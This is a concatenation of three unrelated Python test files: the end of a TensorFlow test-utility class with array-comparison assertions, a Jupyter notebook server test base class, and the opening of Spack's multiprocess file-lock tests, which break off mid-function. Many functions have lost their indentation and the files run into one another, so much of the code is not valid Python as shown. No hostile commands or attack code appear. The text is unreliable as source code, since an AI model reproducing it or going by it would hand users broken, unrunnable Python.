
      Returns:
        True if the thread is alive, otherwise False.
      """
      return self._thread.is_alive()

    def check_termination(self):
      """Returns whether the checked thread was properly used and did terminate.

      Every checked thread should be "join"ed after starting, and before the
      test tears down. If it is not joined, it is possible the thread will hang
      and cause flaky failures in tests.

      Raises:
        self._testcase.failureException: If check_termination was called before
        thread was joined.

        RuntimeError: If the thread is not terminated. This means thread was not
        joined with the main thread.
      """
      if self._is_thread_joined:
        if self.is_alive():
          raise RuntimeError(
              "Thread was not joined with main thread, and is still running "
              "when the test finished.")
      else:
        self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(f1 == f2 or math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
  def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
    # Asserts two array-likes have the same shape and element-wise-close
    # values, printing detailed diagnostics on mismatch before delegating the
    # actual assertion to np.testing.assert_allclose.
    a = self._GetNdArray(a)
    b = self._GetNdArray(b)
    self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
                     (a.shape, b.shape))
    if not np.allclose(a, b, rtol=rtol, atol=atol):
      # Prints more details than np.testing.assert_allclose.
      #
      # NOTE: numpy.allclose (and numpy.testing.assert_allclose)
      # checks whether two arrays are element-wise equal within a
      # tolerance. The relative difference (rtol * abs(b)) and the
      # absolute difference atol are added together to compare against
      # the absolute difference between a and b. Here, we want to
      # print out which elements violate such conditions.
      # NaN-vs-non-NaN positions also count as "not close".
      cond = np.logical_or(
          np.abs(a - b) > atol + rtol * np.abs(b),
          np.isnan(a) != np.isnan(b))
      if a.ndim:
        x = a[np.where(cond)]
        y = b[np.where(cond)]
        print("not close where = ", np.where(cond))
      else:
        # np.where is broken for scalars
        x, y = a, b
      print("not close lhs = ", x)
      print("not close rhs = ", y)
      print("not close dif = ", np.abs(x - y))
      print("not close tol = ", atol + rtol * np.abs(y))
      print("dtype = %s, shape = %s" % (a.dtype, a.shape))
      # TODO(xpan): There seems to be a bug:
      # tensorflow/compiler/tests:binary_ops_test pass with float32
      # nan even though the equal_nan is False by default internally.
      np.testing.assert_allclose(
          a, b, rtol=rtol, atol=atol, err_msg=msg, equal_nan=True)
  def _assertAllCloseRecursive(self,
                               a,
                               b,
                               rtol=1e-6,
                               atol=1e-6,
                               path=None,
                               msg=None):
    # Recursively compares nested structures (dicts, namedtuples, lists,
    # tuples, array-likes) for element-wise closeness. `path` accumulates the
    # index/key trail so failure messages can point at the mismatched leaf.
    path = path or []
    path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
    msg = msg if msg else ""

    # Check if a and/or b are namedtuples.
    if hasattr(a, "_asdict"):
      a = a._asdict()
    if hasattr(b, "_asdict"):
      b = b._asdict()
    a_is_dict = isinstance(a, dict)
    if a_is_dict != isinstance(b, dict):
      raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
                       (path_str, path_str, msg))
    if a_is_dict:
      self.assertItemsEqual(
          a.keys(),
          b.keys(),
          msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
          (path_str, a.keys(), path_str, b.keys(), msg))
      for k in a:
        # Push the key onto the path for the recursive call, pop afterwards.
        path.append(k)
        self._assertAllCloseRecursive(
            a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
        del path[-1]
    elif isinstance(a, (list, tuple)):
      # Try to directly compare a, b as ndarrays; if not work, then traverse
      # through the sequence, which is more expensive.
      try:
        a_as_ndarray = np.array(a)
        b_as_ndarray = np.array(b)
        self._assertArrayLikeAllClose(
            a_as_ndarray,
            b_as_ndarray,
            rtol=rtol,
            atol=atol,
            msg="Mismatched value: a%s is different from b%s. %s" %
            (path_str, path_str, msg))
      except (ValueError, TypeError) as e:
        # Ragged or heterogeneous sequences: compare element-by-element.
        if len(a) != len(b):
          raise ValueError(
              "Mismatched length: a%s has %d items, but b%s has %d items. %s" %
              (path_str, len(a), path_str, len(b), msg))
        for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
          path.append(str(idx))
          self._assertAllCloseRecursive(
              a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
          del path[-1]
    # a and b are ndarray like objects
    else:
      try:
        self._assertArrayLikeAllClose(
            a,
            b,
            rtol=rtol,
            atol=atol,
            msg="Mismatched value: a%s is different from b%s." % (path_str,
                                                                  path_str))
      except TypeError as e:
        # Augment the TypeError with the path and the two mismatched types
        # before re-raising, preserving the original traceback.
        msg = "Error: a%s has %s, but b%s has %s" % (
            path_str, type(a), path_str, type(b))
        e.args = ((e.args[0] + ' : ' + msg,) + e.args[1:])
        raise
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray`, or any arbitrarily nested of structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray`, or any arbitrarily nested of structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
  def assertAllEqual(self, a, b, msg=None):
    """Asserts that two numpy arrays have the same values.

    Args:
      a: the expected numpy ndarray or anything can be converted to one.
      b: the actual numpy ndarray or anything can be converted to one.
      msg: Optional message to report on failure.
    """
    msg = msg if msg else ""
    a = self._GetNdArray(a)
    b = self._GetNdArray(b)
    self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s."
                     " %s" % (a.shape, b.shape, msg))
    same = (a == b)

    # For float arrays, treat matching NaN positions as equal (NaN != NaN by
    # IEEE semantics, which would otherwise flag them as mismatches).
    if a.dtype == np.float32 or a.dtype == np.float64:
      same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
    if not np.all(same):
      # Prints more details than np.testing.assert_array_equal.
      diff = np.logical_not(same)
      if a.ndim:
        x = a[np.where(diff)]
        y = b[np.where(diff)]
        print("not equal where = ", np.where(diff))
      else:
        # np.where is broken for scalars
        x, y = a, b
      print("not equal lhs = ", x)
      print("not equal rhs = ", y)
      # The final assertion (with a proper failure message) is delegated to
      # numpy after the diagnostics above have been printed.
      np.testing.assert_array_equal(a, b, err_msg=msg)
  # pylint: disable=g-doc-return-or-yield
  @contextlib.contextmanager
  def assertRaisesWithPredicateMatch(self, exception_type,
                                     expected_err_re_or_predicate):
    """Returns a context manager to enclose code expected to raise an exception.

    If the exception is an OpError, the op stack is also included in the message
    predicate search.

    Args:
      exception_type: The expected type of exception that should be raised.
      expected_err_re_or_predicate: If this is callable, it should be a function
        of one argument that inspects the passed-in exception and
        returns True (success) or False (please fail the test). Otherwise, the
        error message is expected to match this regular expression partially.

    Returns:
      A context manager to surround code that is expected to raise an
      exception.
    """
    if callable(expected_err_re_or_predicate):
      predicate = expected_err_re_or_predicate
    else:

      def predicate(e):
        # For OpErrors, append the chain of originating op names so the regex
        # can also match against the op stack, not just the message.
        err_str = e.message if isinstance(e, errors.OpError) else str(e)
        op = e.op if isinstance(e, errors.OpError) else None
        while op is not None:
          err_str += "\nCaused by: " + op.name
          op = op._original_op  # pylint: disable=protected-access
        logging.info("Searching within error strings: '%s' within '%s'",
                     expected_err_re_or_predicate, err_str)
        return re.search(expected_err_re_or_predicate, err_str)

    try:
      yield
      # Reaching this line means the enclosed block did not raise at all.
      self.fail(exception_type.__name__ + " not raised")
    except Exception as e:  # pylint: disable=broad-except
      # Re-raise as AssertionError when the exception is of the wrong type or
      # fails the predicate; a matching exception is swallowed (test passes).
      if not isinstance(e, exception_type) or not predicate(e):
        raise AssertionError("Exception of type %s: %s" % (str(type(e)),
                                                           str(e)))
  # pylint: enable=g-doc-return-or-yield
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2,
"Devices %s and %s are not equal. %s" %
(device1, device2, msg))
  # Fix Python 3 compatibility issues
  if six.PY3:
    # pylint: disable=invalid-name

    # Silence a deprecation warning: assertRaisesRegexp was renamed to
    # assertRaisesRegex in Python 3.2; alias the old name to the new one.
    assertRaisesRegexp = googletest.TestCase.assertRaisesRegex

    # assertItemsEqual is assertCountEqual as of 3.2.
    assertItemsEqual = googletest.TestCase.assertCountEqual

    # pylint: enable=invalid-name
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
                         num_ps,
                         protocol="grpc",
                         worker_config=None,
                         ps_config=None):
  """Create and start local servers and return the associated `Server` objects.

  Example:
  ```python
  workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)

  worker_sessions = [tf.Session(w.target) for w in workers]

  with tf.device("/job:ps/task:0"):
    ...
  with tf.device("/job:ps/task:1"):
    ...
  with tf.device("/job:worker/task:0"):
    ...
  with tf.device("/job:worker/task:1"):
    ...

  worker_sessions[0].run(...)
  ```

  Args:
    num_workers: Number of worker servers to start.
    num_ps: Number of PS servers to start.
    protocol: Communication protocol. Allowed values are documented in
      the documentation of `tf.train.Server`.
    worker_config: (optional) ConfigProto to initialize workers. Can be used
      to instantiate multiple devices etc.
    ps_config: (optional) ConfigProto to initialize PS servers.

  Returns:
    A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
    of `num_workers` objects of type `tf.train.Server` (all running locally);
    and `ps_servers` is a list of `num_ps` objects of similar type.

  Raises:
    ImportError: if portpicker module was not found at load time
  """
  # portpicker is an optional dependency; the import error captured at module
  # load time is deferred until this function is actually used.
  if _portpicker_import_error:
    raise _portpicker_import_error  # pylint: disable=raising-bad-type
  # Pick free ports for every worker and PS task on localhost.
  worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
  ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
  cluster_dict = {
      "worker": ["localhost:%s" % port for port in worker_ports],
      "ps": ["localhost:%s" % port for port in ps_ports]
  }
  cs = server_lib.ClusterSpec(cluster_dict)

  # All servers are started eagerly (start=True).
  workers = [
      server_lib.Server(
          cs,
          job_name="worker",
          protocol=protocol,
          task_index=ix,
          config=worker_config,
          start=True) for ix in range(num_workers)
  ]
  ps_servers = [
      server_lib.Server(
          cs,
          job_name="ps",
          protocol=protocol,
          task_index=ix,
          config=ps_config,
          start=True) for ix in range(num_ps)
  ]

  return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
  """Returns the `NodeDef` instance for given node name in the graph def.

  This method explores only the NodeDefs in `graph_def.node`.

  Args:
    node_name: Name of the NodeDef to search for.
    graph_def: An instance of `GraphDef` proto.

  Returns:
    the `NodeDef` instance whose name field matches the given node_name or None.
  """
  # First match wins; None when no NodeDef has the requested name.
  return next(
      (node_def for node_def in graph_def.node if node_def.name == node_name),
      None)
def set_producer_version(graph, producer_version):
  """Sets graph.graph_def_versions.producer to `producer_version`.

  Args:
    graph: The graph whose producer version is overwritten (must support
      `as_default()` and `graph_def_versions`).
    producer_version: int, the producer version to set.
  """
  # The C API doesn't expose altering GraphDefVersions. We can indirectly set
  # it via import_graph_def though.
  graph_def = graph_pb2.GraphDef()
  graph_def.versions.producer = producer_version
  with graph.as_default():
    importer.import_graph_def(graph_def)
  # Bug fix: the original `assert x, producer_version` only tested the
  # truthiness of the producer field (using producer_version as the assert
  # message) and would fail spuriously for producer_version == 0. The evident
  # intent is an equality check.
  assert graph.graph_def_versions.producer == producer_version
|
launchnotebook.py | """Base class for notebook tests."""
from __future__ import print_function
import os
import sys
import time
import requests
from contextlib import contextmanager
from threading import Thread, Event
from unittest import TestCase
pjoin = os.path.join
try:
from unittest.mock import patch
except ImportError:
from mock import patch #py2
from tornado.ioloop import IOLoop
from ..notebookapp import NotebookApp
from ipython_genutils.tempdir import TemporaryDirectory
MAX_WAITTIME = 30 # seconds to wait for notebook server to start
POLL_INTERVAL = 0.1 # time between attempts
# TimeoutError is a builtin on Python 3. This can be removed when we stop
# supporting Python 2.
class TimeoutError(Exception):
    """Raised when the notebook server fails to start or stop in time."""
    pass
class NotebookTestBase(TestCase):
"""A base class for tests that need a running notebook.
This create some empty config and runtime directories
and then starts the notebook server with them.
"""
port = 12341
config = None
@classmethod
def wait_until_alive(cls):
"""Wait for the server to be alive"""
url = 'http://localhost:%i/api/contents' % cls.port
for _ in range(int(MAX_WAITTIME/POLL_INTERVAL)):
try:
requests.get(url)
except Exception as e:
if cls.notebook.poll() is not None:
raise RuntimeError("The notebook server exited with status %s" \
% cls.notebook.poll())
time.sleep(POLL_INTERVAL)
else:
return
raise TimeoutError("The notebook server didn't start up correctly.")
@classmethod
def wait_until_dead(cls):
"""Wait for the server process to terminate after shutdown"""
cls.notebook_thread.join(timeout=MAX_WAITTIME)
if cls.notebook_thread.is_alive():
raise TimeoutError("Undead notebook server")
@classmethod
def setup_class(cls):
cls.home_dir = TemporaryDirectory()
data_dir = TemporaryDirectory()
cls.env_patch = patch.dict('os.environ', {
'HOME': cls.home_dir.name,
'IPYTHONDIR': pjoin(cls.home_dir.name, '.ipython'),
'JUPYTER_DATA_DIR' : data_dir.name
})
cls.env_patch.start()
cls.config_dir = TemporaryDirectory()
cls.data_dir = data_dir
cls.runtime_dir = TemporaryDirectory()
cls.notebook_dir = TemporaryDirectory()
app = cls.notebook = NotebookApp(
port=cls.port,
port_retries=0,
open_browser=False,
config_dir=cls.config_dir.name,
data_dir=cls.data_dir.name,
runtime_dir=cls.runtime_dir.name,
notebook_dir=cls.notebook_dir.name,
config=cls.config,
)
# clear log handlers and propagate to root for nose to capture it
# needs to be redone after initialize, which reconfigures logging
app.log.propagate = True
app.log.handlers = []
app.initialize(argv=[])
app.log.propagate = True
app.log.handlers = []
started = Event()
def start_thread():
loop = IOLoop.current()
loop.add_callback(started.set)
try:
app.start()
finally:
# set the event, so failure to start doesn't cause a hang
started.set()
cls.notebook_thread = Thread(target=start_thread)
cls.notebook_thread.start()
started.wait()
cls.wait_until_alive()
@classmethod
def teardown_class(cls):
cls.notebook.stop()
cls.wait_until_dead()
cls.env_patch.start()
cls.home_dir.cleanup()
cls.config_dir.cleanup()
cls.data_dir.cleanup()
cls.runtime_dir.cleanup()
cls.notebook_dir.cleanup()
@classmethod
def base_url(cls):
return 'http://localhost:%i/' % cls.port
@contextmanager
def assert_http_error(status, msg=None):
try:
yield
except requests.HTTPError as e:
real_status = e.response.status_code
assert real_status == status, \
"Expected status %d, got %d" % (status, real_status)
if msg:
assert msg in str(e), e
else:
assert False, "Expected HTTP error status" |
lock.py | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""These tests ensure that our lock works correctly.
This can be run in two ways.
First, it can be run as a node-local test, with a typical invocation like
this::
spack test lock
You can *also* run it as an MPI program, which allows you to test locks
across nodes. So, e.g., you can run the test like this::
mpirun -n 7 spack test lock
And it will test locking correctness among MPI processes. Ideally, you
want the MPI processes to span across multiple nodes, so, e.g., for SLURM
you might do this::
srun -N 7 -n 7 -m cyclic spack test lock
You can use this to test whether your shared filesystem properly supports
POSIX reader-writer locking with byte ranges through fcntl.
If you want to test on multiple filesystems, you can modify the
``locations`` list below. By default it looks like this::
locations = [
tempfile.gettempdir(), # standard tmp directory (potentially local)
'/nfs/tmp2/%u', # NFS tmp mount
'/p/lscratch*/%u' # Lustre scratch mount
]
Add names and paths for your preferred filesystem mounts to test on them;
the tests are parametrized to run on all the filesystems listed in this
dict. Note that 'tmp' will be skipped for MPI testing, as it is often a
node-local filesystem, and multi-node tests will fail if the locks aren't
actually on a shared filesystem.
"""
import collections
import errno
import fcntl
import getpass
import glob
import os
import shutil
import socket
import tempfile
import traceback
from contextlib import contextmanager
from multiprocessing import Process, Queue
import pytest
import llnl.util.lock as lk
import llnl.util.multiproc as mp
from llnl.util.filesystem import touch
#
# This test can be run with MPI. MPI is "enabled" if we can import
# mpi4py and the number of total MPI processes is greater than 1.
# Otherwise it just runs as a node-local test.
#
# NOTE: MPI mode is different from node-local mode in that node-local
# mode will spawn its own test processes, while MPI mode assumes you've
# run this script as a SPMD application. In MPI mode, no additional
# processes are spawned, and you need to ensure that you mpirun the
# script with enough processes for all the multiproc_test cases below.
#
# If you don't run with enough processes, tests that require more
# processes than you currently have will be skipped.
#
mpi = False
comm = None
try:
from mpi4py import MPI
comm = MPI.COMM_WORLD
if comm.size > 1:
mpi = True
except ImportError:
pass
"""This is a list of filesystem locations to test locks in. Paths are
expanded so that %u is replaced with the current username. '~' is also
legal and will be expanded to the user's home directory.
Tests are skipped for directories that don't exist, so you'll need to
update this with the locations of NFS, Lustre, and other mounts on your
system.
"""
locations = [
tempfile.gettempdir(),
os.path.join('/nfs/tmp2/', getpass.getuser()),
os.path.join('/p/lscratch*/', getpass.getuser()),
]
"""This is the longest a failed multiproc test will take.
Barriers will time out and raise an exception after this interval.
In MPI mode, barriers don't time out (they hang). See mpi_multiproc_test.
"""
barrier_timeout = 5
"""This is the lock timeout for expected failures.
This may need to be higher for some filesystems."""
lock_fail_timeout = 0.1
def make_readable(*paths):
for path in paths:
mode = 0o555 if os.path.isdir(path) else 0o444
os.chmod(path, mode)
def make_writable(*paths):
for path in paths:
mode = 0o755 if os.path.isdir(path) else 0o744
os.chmod(path, mode)
@contextmanager
def read_only(*paths):
modes = [os.stat(p).st_mode for p in paths]
make_readable(*paths)
yield
for path, mode in zip(paths, modes):
os.chmod(path, mode)
@pytest.fixture(scope='session', params=locations)
def lock_test_directory(request):
"""This fixture causes tests to be executed for many different mounts.
See the ``locations`` dict above for details.
"""
return request.param
@pytest.fixture(scope='session')
def lock_dir(lock_test_directory):
parent = next((p for p in glob.glob(lock_test_directory)
if os.path.exists(p) and os.access(p, os.W_OK)), None)
if not parent:
# Skip filesystems that don't exist or aren't writable
pytest.skip("requires filesystem: '%s'" % lock_test_directory)
elif mpi and parent == tempfile.gettempdir():
# Skip local tmp test for MPI runs
pytest.skip("skipping local tmp directory for MPI test.")
tempdir = None
if not mpi or comm.rank == 0:
tempdir = tempfile.mkdtemp(dir=parent)
if mpi:
tempdir = comm.bcast(tempdir)
yield tempdir
if mpi:
# rank 0 may get here before others, in which case it'll try to
# remove the directory while other processes try to re-create the
# lock. This will give errno 39: directory not empty. Use a
# barrier to ensure everyone is done first.
comm.barrier()
if not mpi or comm.rank == 0:
make_writable(tempdir)
shutil.rmtree(tempdir)
@pytest.fixture
def private_lock_path(lock_dir):
"""In MPI mode, this is a private lock for each rank in a multiproc test.
For other modes, it is the same as a shared lock.
"""
lock_file = os.path.join(lock_dir, 'lockfile')
if mpi:
lock_file += '.%s' % comm.rank
yield lock_file
if os.path.exists(lock_file):
make_writable(lock_dir, lock_file)
os.unlink(lock_file)
@pytest.fixture
def lock_path(lock_dir):
"""This lock is shared among all processes in a multiproc test."""
lock_file = os.path.join(lock_dir, 'lockfile')
yield lock_file
if os.path.exists(lock_file):
make_writable(lock_dir, lock_file)
os.unlink(lock_file)
def test_poll_interval_generator():
interval_iter = iter(
lk.Lock._poll_interval_generator(_wait_times=[1, 2, 3]))
intervals = list(next(interval_iter) for i in range(100))
assert intervals == [1] * 20 + [2] * 40 + [3] * 40
def local_multiproc_test(*functions, **kwargs):
"""Order some processes using simple barrier synchronization."""
b = mp.Barrier(len(functions), timeout=barrier_timeout)
args = (b,) + tuple(kwargs.get('extra_args', ()))
procs = [Process(target=f, args=args, name=f.__name__)
for f in functions]
for p in procs:
p.start()
for p in procs:
p.join()
assert all(p.exitcode == 0 for p in procs)
def mpi_multiproc_test(*functions):
"""SPMD version of multiproc test.
This needs to be run like so:
srun spack test lock
Each process executes its corresponding function. This is different
from ``multiproc_test`` above, which spawns the processes. This will
skip tests if there are too few processes to run them.
"""
procs = len(functions)
if procs > comm.size:
pytest.skip("requires at least %d MPI processes" % procs)
comm.Barrier() # barrier before each MPI test
include = comm.rank < len(functions)
subcomm = comm.Split(include)
class subcomm_barrier(object):
"""Stand-in for multiproc barrier for MPI-parallel jobs."""
def wait(self):
subcomm.Barrier()
if include:
try:
functions[subcomm.rank](subcomm_barrier())
except BaseException:
# aborting is the best we can do for MPI tests without
# hanging, since we're using MPI barriers. This will fail
# early and it loses the nice pytest output, but at least it
# gets use a stacktrace on the processes that failed.
traceback.print_exc()
comm.Abort()
subcomm.Free()
comm.Barrier() # barrier after each MPI test.
"""``multiproc_test()`` should be called by tests below.
``multiproc_test()`` will work for either MPI runs or for local runs.
"""
multiproc_test = mpi_multiproc_test if mpi else local_multiproc_test
#
# Process snippets below can be composed into tests.
#
class AcquireWrite(object):
def __init__(self, lock_path, start=0, length=0):
self.lock_path = lock_path
self.start = start
self.length = length
@property
def __name__(self):
return self.__class__.__name__
def __call__(self, barrier):
lock = lk.Lock(self.lock_path, self.start, self.length)
lock.acquire_write() # grab exclusive lock
barrier.wait()
barrier.wait() # hold the lock until timeout in other procs.
class AcquireRead(object):
def __init__(self, lock_path, start=0, length=0):
self.lock_path = lock_path
self.start = start
self.length = length
@property
def __name__(self):
return self.__class__.__name__
def __call__(self, barrier):
lock = lk.Lock(self.lock_path, self.start, self.length)
lock.acquire_read() # grab shared lock
barrier.wait()
barrier.wait() # hold the lock until timeout in other procs.
class TimeoutWrite(object):
def __init__(self, lock_path, start=0, length=0):
self.lock_path = lock_path
self.start = start
self.length = length
@property
def __name__(self):
return self.__class__.__name__
def __call__(self, barrier):
lock = lk.Lock(self.lock_path, self.start, self.length)
barrier.wait() # wait for lock acquire in first process
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
barrier.wait()
class TimeoutRead(object):
def __init__(self, lock_path, start=0, length=0):
self.lock_path = lock_path
self.start = start
self.length = length
@property
def __name__(self):
return self.__class__.__name__
def __call__(self, barrier):
lock = lk.Lock(self.lock_path, self.start, self.length)
barrier.wait() # wait for lock acquire in first process
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait()
#
# Test that exclusive locks on other processes time out when an
# exclusive lock is held.
#
def test_write_lock_timeout_on_write(lock_path):
multiproc_test(
AcquireWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_write_2(lock_path):
multiproc_test(
AcquireWrite(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_write_3(lock_path):
multiproc_test(
AcquireWrite(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_write_ranges(lock_path):
multiproc_test(
AcquireWrite(lock_path, 0, 1),
TimeoutWrite(lock_path, 0, 1))
def test_write_lock_timeout_on_write_ranges_2(lock_path):
multiproc_test(
AcquireWrite(lock_path, 0, 64),
AcquireWrite(lock_path, 65, 1),
TimeoutWrite(lock_path, 0, 1),
TimeoutWrite(lock_path, 63, 1))
def test_write_lock_timeout_on_write_ranges_3(lock_path):
multiproc_test(
AcquireWrite(lock_path, 0, 1),
AcquireWrite(lock_path, 1, 1),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_write_ranges_4(lock_path):
multiproc_test(
AcquireWrite(lock_path, 0, 1),
AcquireWrite(lock_path, 1, 1),
AcquireWrite(lock_path, 2, 456),
AcquireWrite(lock_path, 500, 64),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
#
# Test that shared locks on other processes time out when an
# exclusive lock is held.
#
def test_read_lock_timeout_on_write(lock_path):
multiproc_test(
AcquireWrite(lock_path),
TimeoutRead(lock_path))
def test_read_lock_timeout_on_write_2(lock_path):
multiproc_test(
AcquireWrite(lock_path),
TimeoutRead(lock_path),
TimeoutRead(lock_path))
def test_read_lock_timeout_on_write_3(lock_path):
multiproc_test(
AcquireWrite(lock_path),
TimeoutRead(lock_path),
TimeoutRead(lock_path),
TimeoutRead(lock_path))
def test_read_lock_timeout_on_write_ranges(lock_path):
"""small write lock, read whole file."""
multiproc_test(
AcquireWrite(lock_path, 0, 1),
TimeoutRead(lock_path))
def test_read_lock_timeout_on_write_ranges_2(lock_path):
"""small write lock, small read lock"""
multiproc_test(
AcquireWrite(lock_path, 0, 1),
TimeoutRead(lock_path, 0, 1))
def test_read_lock_timeout_on_write_ranges_3(lock_path):
"""two write locks, overlapping read locks"""
multiproc_test(
AcquireWrite(lock_path, 0, 1),
AcquireWrite(lock_path, 64, 128),
TimeoutRead(lock_path, 0, 1),
TimeoutRead(lock_path, 128, 256))
#
# Test that exclusive locks time out when shared locks are held.
#
def test_write_lock_timeout_on_read(lock_path):
multiproc_test(
AcquireRead(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_read_2(lock_path):
multiproc_test(
AcquireRead(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_read_3(lock_path):
multiproc_test(
AcquireRead(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_read_ranges(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 1),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_read_ranges_2(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 1),
